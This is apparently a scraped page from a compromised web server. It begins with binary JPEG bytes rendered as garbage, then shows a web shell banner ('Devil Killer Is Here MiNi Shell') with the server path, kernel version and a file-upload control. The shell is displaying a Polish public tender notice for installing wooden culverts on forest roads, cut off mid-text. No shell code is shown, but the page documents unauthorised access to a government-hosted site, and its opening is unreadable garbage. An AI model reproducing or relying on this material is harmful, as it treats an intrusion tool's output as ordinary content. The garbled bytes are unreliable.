JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210923/0018963001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Osadzanie wodospustów drewnianych drążonych na drogach leśnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska Górka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 071001984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zielona 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Węgierska Górka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wegierska@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_wegierska</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Osadzanie wodospustów drewnianych drążonych na drogach leśnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4ce8235c-1c3c-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00189630</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/nadlesnictwo-wegierska-gorka/zamowienia-publiczne5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu.<br/>Więcej szczegółów dot. sposobu komunikacji i składania ofert znajduje się Specyfikacji Istotnych Warunków Zamówienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2).	Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. <br/>3).	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>4).	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB. <br/>5).	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>6).	Identyfikator postępowania i klucz publiczny dla niniejszego postępowania o udzielenie zamówienia dostępne są na liście wszystkich postępowań na miniPortalu oraz stanowi załącznik nr 12 do SWZ.<br/>7).	Ofertę sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>8).	Złożenie oferty:<br/>a) Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Klucz publiczny niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu. W formularzu Oferty (załącznik nr 1 do SWZ) Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>b) Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247) w szczególności: doc, .docx i podpisana kwalifikowanym podpisem elektronicznym. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w Regulaminie korzystania z miniPortal. Ofertę należy złożyć w oryginale. <br/>c) Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP). <br/>d) Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionych również na miniPortalu. Sposób zmiany i wycofania oferty został opisany w Instrukcji użytkownika dostępnej na miniPortalu.<br/>f) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska Górka; (Kontakt do Inspektora Ochrony Danych: CompNet Sp.z o.o. , ul. Leszczynowa 33A, 62-500 Konin, iod@comp-net.pl.)<br/>2.	Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. <br/>3.	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. <br/>4.	Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności <br/>5.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6.	Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o art. 8-8a oraz 96 ust. 3-3b PZP.<br/>7.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>8.	Niezależnie od postanowień pkt 18.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>9.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe, <br/>10.	Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>(cała treść klauzuli znajduje się w Specyfikacji Warunków Zamówienia)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Z.270.2.2021.PG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 294598,99 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1- Leśnictwo Żabnica<br/>Lokalizacja inwestycji: Powiat Żywiecki, Gmina: Węgierska Górka, leśnictwo: Żabnica<br/>- DROGA LEŚNA 220/113 LEŚNICTWO ŻABNICA <br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 10 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/>- DROGA LEŚNA 220/140 LEŚNICTWO ŻABNICA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 30 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/>-DROGA LEŚNA 220/154 LEŚNICTWO ŻABNICA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 10 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 36368,63 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">12.1. Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie omyłki zgodnie z przepisami ustawy Pzp.<br/>	<br/>	12.2. Przy wyborze oferty zamawiający będzie się kierował następującymi kryterium oceny ofert:<br/>1)	Cena - 60 %<br/>2)	Gwarancja i rękojmia – 40 %<br/>12.3. Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	W ramach kryterium „Cena” ocena ofert z ostanie dokonana przy zastosowaniu wzoru: <br/><br/> Cn<br/>C = ------------- x 100pkt x 60%<br/> Co <br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/><br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego przedmiotu zamówienia) podana w formularzu oferty. W tym kryterium wykonawca może uzyskać maksymalnie 60 punktów. <br/><br/>2)	Kryterium (G) okresu gwarancji– waga 40%<br/><br/>Sposób obliczania punktów dla w/w kryterium: <br/><br/>Gwarancja w miesiącach<br/>Liczba punktów<br/>36 – 47<br/>0<br/>48 – 59<br/>20<br/>60 i wyżej	40<br/><br/>a). Kryterium gwarancji na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji i rękojmi .<br/>b). Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez zamawiającego to 36 miesięcy liczonych od daty ostatecznego odbioru robót, przy czym bieg gwarancji rozpoczyna się z datą protokołu bezusterkowego odbioru końcowego robót budowlanych. <br/>c). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Wykonawca może zaproponować okres gwarancji i rękojmi w pełnych miesiącach tj. 36, 37,....,60 miesięcy. Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki zamawiający uzna, że wykonawca deklaruje najkrótszy tj. 36 miesięczny okres gwarancji i rękojmi. <br/><br/>12.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów. Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi<br/>12.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2- Leśnictwo Zielona,<br/>Lokalizacja inwestycji: Powiat Żywiecki, Gmina: Węgierska Górka, leśnictwo: Zielona<br/>-DROGA LEŚNA 220/103 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 22 komplety<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy.<br/><br/>-DROGA LEŚNA 220/105 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 16 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. <br/><br/>-DROGA LEŚNA 220/127 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego wykonanego według rysunku nr 1 w nawierzchni drogi pod odpowiednim skosem oraz spadkiem celem odpowiedniego odprowadzania wód powierzchniowych /długość elementu 5,50m/ - 48 kompletów.<br/>• Wykonanie obsypki zamontowanego wodospustu wraz z zagęszczeniem.<br/>Montaż oraz obsypkę wraz z zagęszczeniem należy wykonać w taki sposób aby dopasować wodospust do nawierzchni drogi aby nie pogorszyć komfortu jazdy. <br/><br/>-DROGA LEŚNA 220/149 LEŚNICTWO ZIELONA<br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>• Rozebranie starych wodospustów z jezdni wraz z utylizacją materiałów z rozbiórki.<br/>• Osadzenie nowego wodospustu drewnianego drążonego 